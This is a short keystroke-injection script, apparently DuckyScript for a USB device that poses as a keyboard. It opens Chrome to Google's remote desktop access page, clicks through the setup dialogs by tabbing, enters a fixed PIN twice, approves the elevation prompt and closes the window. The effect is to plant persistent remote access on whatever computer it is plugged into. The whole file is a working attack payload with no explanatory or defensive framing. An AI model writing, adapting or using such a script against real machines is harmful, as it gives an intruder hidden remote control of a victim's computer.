DELAY 2000
GUI r
DELAY 300
STRING chrome
DELAY 100
ENTER
DELAY 300
STRING https://remotedesktop.google.com/access/
DELAY 500
ENTER
DELAY 500
F11
DELAY 300
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 300
ENTER
DELAY 500
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 300
TAB
DELAY 200
ENTER
DELAY 300
ESC
DELAY 700
TAB
TAB
TAB
TAB
TAB
DELAY 200
ENTER
DELAY 700
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
DELAY 400
ENTER
ENTER
DELAY 1500
ENTER
DELAY 500
STRING 498253890554553254785686
DELAY 200
TAB
DELAY 200 
STRING 498253890554553254785686
DELAY 200
ENTER
DELAY 400
ALT Y
DELAY 600 
ALT F4
